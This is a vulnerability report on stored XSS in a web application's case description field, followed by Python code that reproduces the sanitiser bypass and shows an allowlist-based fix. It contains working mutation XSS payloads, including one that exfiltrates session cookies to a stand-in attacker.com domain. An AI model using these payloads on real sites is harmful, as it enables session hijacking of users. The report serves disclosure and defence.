Stored XSS in the Cases functionality

Source: huntr (www.huntr.dev), report F7C7FCBC-5421-4A29-9385-346A1CAA485B
Reported by: illume-security
Published: Aug 14, 2023 - 10:55 a.m. (2023-08-14 10:55:29)
Tags: stored xss, cases functionality, insufficient sanitisation

EPSS

0.001

Percentile

20.8%

Description

When creating or editing a case, the web application fails to perform sufficient sanitisation on the description POST parameter, allowing users to inject HTML carrying malicious JavaScript event handlers. The application does attempt to remove unauthorised elements and events; however, the testing team found it was possible to turn those defences against the application by building a payload that, once sanitised, is mutated into the intended malicious payload and then trusted by the application.

Proof of Concept

The proof of concept below shows the mutation of the user input, which results in an img tag being accepted by the web application, complete with an onerror event that displays an alert box.

------WebKitFormBoundary4U8MLHW3Z3MyBsHm
Content-Disposition: form-data; name="description"

<svg><<svg>im<svg>g src=1 alt=''"<svg>on<svg>error='alert(2)' />

Resulting in the following HTML being shown in the case:

<img src alt="''">

As the web application also does not set the HttpOnly flag on the session cookie, the following payload could be used to access the user's session cookie. As the web application also does not implement a sufficient Content Security Policy (CSP) configuration, it is then possible to send each user's cookies to an attacker-controlled domain when they view the malicious payload:

<svg><<svg>im<svg>g src=1 alt=''"<svg>on<svg>error='if(!window.payloadExecuted){window.payloadExecuted=true;this.src=`//attacker.co<svg>m/?cookie=`+<svg>docu<svg>ment.co<svg>okie}' />

Once accepted by the application, the following HTML will appear in the case:

<img src="//attacker.com/?cookie=PHPSESSID=4lj7o4rj58lon4nkrq320auk07; Accounts_sp_tab=All; Cases_sp_tab=All" alt="''">
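The mutation described in the Description and shown in the proof of concept above, as an added example that is not code from the report or from the affected product: strip_once is a hypothetical single-pass string sanitiser that reproduces the splice (the event filter runs before the tag filter and never sees the split-up onerror), and AllowlistSanitizer shows the mitigation, which parses the input once and re-serialises only allowlisted tags and attributes, so removed tokens cannot recombine into a new tag. The allowlist and the URL-scheme check are assumptions chosen for the demonstration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed test input: the mutation payload quoted in the report.
PAYLOAD = "<svg><<svg>im<svg>g src=1 alt=''\"<svg>on<svg>error='alert(2)' />"

def strip_once(html):
    """Hypothetical single-pass string sanitiser (not the product's code):
    delete on* event attributes first, then delete disallowed <svg> tags.
    The event filter never sees 'onerror' because <svg> splits it, and the
    tag filter then splices the fragments into an <img ... onerror=...> tag."""
    html = re.sub(r"\bon\w+\s*=\s*(['\"]).*?\1", "", html, flags=re.I | re.S)
    return re.sub(r"</?svg\b[^>]*>", "", html, flags=re.I)

# Allowlist for the parse-then-serialise sanitiser below (assumed for the demo).
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(),
           "a": {"href"}, "img": {"src", "alt"}}
VOID = {"br", "img"}  # emitted without a closing tag

def _safe_url(value):
    v = (value or "").strip().lower()
    return v.startswith(("http://", "https://", "/")) or ":" not in v

class AllowlistSanitizer(HTMLParser):
    """Tokenise the input once, then rebuild output only from allowlisted
    tags and attributes, escaping every text node and attribute value.
    Dropped tokens never re-enter a parser, so they cannot recombine."""
    def __init__(self):
        super().__init__()
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # drop the tag itself; its text content is still kept as text
        kept = [(k, v or "") for k, v in attrs
                if k in ALLOWED[tag] and (k not in ("href", "src") or _safe_url(v))]
        attr_text = "".join(f' {k}="{escape(v, quote=True)}"' for k, v in kept)
        self.out.append(f"<{tag}{attr_text}>")
    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(escape(data, quote=True))

def sanitize(html):
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

Run against PAYLOAD, strip_once yields a live img tag with an onerror attribute that was not present in the input, while sanitize yields only escaped text.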
